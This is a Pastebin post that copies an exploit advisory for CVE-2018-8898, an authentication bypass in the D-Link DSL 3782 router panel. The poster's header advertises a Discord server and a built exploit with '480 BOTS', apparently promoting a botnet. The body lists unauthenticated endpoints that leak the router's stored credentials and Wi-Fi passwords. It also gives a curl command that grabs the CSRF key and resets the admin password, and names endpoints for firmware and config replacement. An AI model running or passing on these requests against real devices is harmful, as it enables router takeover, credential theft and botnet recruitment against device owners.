SHARE
TWEET

[D-Link DSL 3782 EXPLOIT]

xB4ckdoorREAL Nov 4th, 2018 (edited) 736 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD: https://discord.gg/PTW3yPp [BUILDED EXPLOIT][AVRG/S: IN 4 HOUR BY 10 SERVER ONLY 480 BOTS,FIXED SHIT.]
  2.  
  3. #AUTH BYPASS.
  4. # Version: A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67"
  5. # Category: Webapps
  6. # CVE : CVE-2018-8898
  7. # Date: 20/05/2018
  8.  
  9. # Description
  10. # The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not release a token ID (e.g. a session cookie) that identifies the logged in administrator, but only relies # on a server-side timeout that lasts few minutes.
  11. # In addition, a server-side mitigation in place prompts for login credentials everytime the webroot is loaded, but does leave the application endpoints unprotected # and affected by this authentication bypass.
  12.  
  13. # Therefore,  after a valid login of the administrator the web panel does not distinguish valid HTTP requests from the admin and the ones that come from other users.
  14. # This way, an attacker can script an automatic routine that perform unwanted actions such as arbitrary modifications to router and SSIDs passwords and configurations.
  15.  
  16. # Some of the possible actions for retrieving important information
  17. # GET  http://192.168.1.1/romfile.cfg ---> retrieve the complete settings of the router (all credentials included)
  18. # GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ---> retrieve the password for SSID of 2.4Ghz
  19. # GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---> retrieve the password for SSID of 5.0Ghz
  20. # GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp    ---> retrieve the password for Guest network, if present
  21.  
  22. # For POST requests that makes changes to passwords, SSIDs name and configurations, a 'sessionKey' value is used by the web application to prevent Cross-site request forgery (CSRF) attacks.
  23. # However, this value can be retrieved with this Authentication Bypass issue with the following GET request:
  24. # 'GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp'
  25.  
  26. # For example, the below POST request allows to change the Web Interface Administrator's password:
  27. curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
  28. --data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
  29. http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
  30.  
  31. # Some other possible actions for altering the configurations:
  32. # POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp ---> change passwords of the SSIDs
  33. # POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp ---> upgrade firmware
  34. # POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp ---> reboot router
  35. # POST /cgi-bin/New_GUI/Set/config_upgrade.asp  ---> upload a new configuration file ('romfile.cfg')
  36.  
  37. # Note 1: Since the router misses a network segretation, a user that has access to the Guest network could also perform this attack.
  38. # Note 2: Web panels exposed to the Internet allows anonymous attacker to leverage this vulnerability and possibly takeover the router.
  39. # Note 3: Others forks of the firmware and software versions have not been tested.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top